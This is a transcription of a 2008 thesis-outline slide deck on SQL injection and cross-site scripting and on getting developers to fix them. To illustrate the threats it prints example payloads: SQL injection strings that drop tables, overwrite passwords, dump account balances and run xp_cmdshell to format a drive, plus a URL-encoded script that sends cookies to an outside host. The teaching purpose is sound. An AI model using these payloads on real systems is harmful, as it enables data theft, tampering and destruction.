Whatever it takes. Fixing SQLIA and XSS in the process. Diploma Thesis Outline Presentation, Florian Thiel

Transcription

1 Whatever it takes Fixing SQLIA and XSS in the process Diploma Thesis Outline Presentation, Florian Thiel Seminar Beiträge zum Software Engineering, FU Berlin, 11/06/2008

2

3 OWASP Top XSS 2. Injection Flaws 3. Malicious File Execution 4. Insecure Direct Object Reference 5. Cross-Site Request Forgery

4 OWASP Top XSS 2. Injection Flaws 3. Malicious File Execution 4. Insecure Direct Object Reference 5. Cross-Site Request Forgery

5 by xckd:

6 by xckd:

7 SELECT firstname FROM Students WHERE (login = %s ); % login by xckd:

8 SELECT firstname FROM Students WHERE (login = %s ); % login by xckd: SELECT firstname FROM Students WHERE (login = Robert ); DROP TABLE Students; -- );

9 SQLIA threats data integrity confidentiality new attack vector

10 UPDATE Users SET password = %s WHERE uid = %s ; % (pw, uid)

11 UPDATE Users SET password = password WHERE uid = robert OR 1=1; -- ; Integrity

12 SELECT product FROM Products WHERE productid = %s ; % pid

13 SELECT product FROM Products WHERE productid = 0 UNION SELECT owner, balance FROM Accounts; -- ; Confidentiality

14 SELECT product, price FROM products WHERE category = %s ; % category

15 SELECT product, price FROM products WHERE categoryid = exec master..xp_cmdshell format c: -- ; New Attack Vector

16 Bad Mitigations PHP: addslashes() IDS blacklisting validation blacklisting

17 Decent Mitigations stmt = prepare( SELECT name FROM Users WHERE uid = $1 ) db.execute(stmt, uid)

18 Why it s hard Control Data

19 More problems validation context!= execution context really tolerant DBs SEL + ECT, anyone? DBs trying to fix illegal SQL

20 Something different!? keyword= <script>alert( you have been XSSed! )</script>

21 Something different!? keyword= <script>alert( you have been XSSed! )</script>

22 This issue isn't just about scripting, and there isn't necessarily anything cross site about it. So why the name? It was coined earlier on when the problem was less understood, and it stuck. Believe me, we have had more important things to do than think of a better name. <g>. -- Marc Slemko, Apache.org

23 eval( user input ) 1,2 1) the essence of XSS 2) limited only by the execution environment

24 XSS code injection popular in ECMAScript/Web2.0

25 Got cookies? <script>document.location=' +document.cookie</script>

26 Got cookies? %3c%73%63%72%69%70%74%3e%64%6f %63%75%6d%65%6e%74%2e%6c%6f %63%61%74%69%6f%6e%3d%27%68%74%74 %70%3a%2f%2f%77%77%77%2e %63%67%69%73%65%63%75%72 %69%74%79%2e%63%6f%6d%2f%63%67%69%2d %62%69%6e %2f%63%6f%6f%6b %69%65%2e%63%67%69%3f%27%20%2b%64%6f %63%75%6d%65%6e%74%2e%63%6f%6f%6b %69%65%3c %2f%73%63%72%69%70%74%3e

27

28 The Worm

29 (Non-working) XSS Mitigations blacklisting of cribs blacklisting of characters

30 helpful mitigations HTTPOnly cookies Whitelisting of characters

31 Common flaws HTML/XSS and SQL mix data and control have no well-defined execution environment

32 Common flaws HTML/XSS and SQL mix data and control have no well-defined execution environment have no API

33 Failure to sanitize data into a different plane

34 Safe Query Objects real SQL API adds static types dynamic queries still runtime evaluated

35 AntiSamy Policy-based sanitation for HTML entities Types (by RegEx) (no semantics)

36 Another job well done!

37 GET /en-us/library/aa287673(vs.71).aspx HTTP/1.1 Host: msdn.microsoft.com User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-us; rv: ) Gecko/ Firefox/3.0.3 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO ,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: +example&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en- US:official&client=firefox-a Cache-Control: max-age=0

38

39 Hmm, are we missing something here?

40 Absolutely!

41 The interesting* part * what my thesis is really about

42 Make sure that the technical solutions are thoroughly applied

43 1. Make developers use a reasonable architecture 2. Make developers recognize a weakness when they meet one 3. Make developers find weaknesses 4. Make people actually fix things

44 1) (Architecture) centralization canonicalization have to be conservative

45 2) (Recognition) patterns? flawed code examples in the wild

46 3) (Detection) automated flow analysis code inspection

47 Code inspection need a reading technique defect-based reading

48 Artifacts reviewer annotates suspicious code makes review work visible in the source code and more valuable since annotations can be reused

49 // [insert data into query, ignore non-alphanums] def insertalphanum(query, data): // [make sure data is canonical] c_data = data.tocharset(...) c_data.replace(...)... // [insert data into query] query.prepare(...) query.insert(data...)...

50 4) (Repair) once weakness is known, developers should be motivated enough focus is on keeping the code secure, minimizing effort

51 My tasks provide practical architectural assumptions construct effective reading method + awareness of potential weaknesses get a project to adopt my methods

52 Questions?

53 This presentation is licensed under a Creative Commons BY-SA license. Attribution for pictures through links. Slides, materials, progress etc. can be

54 Thank you!

55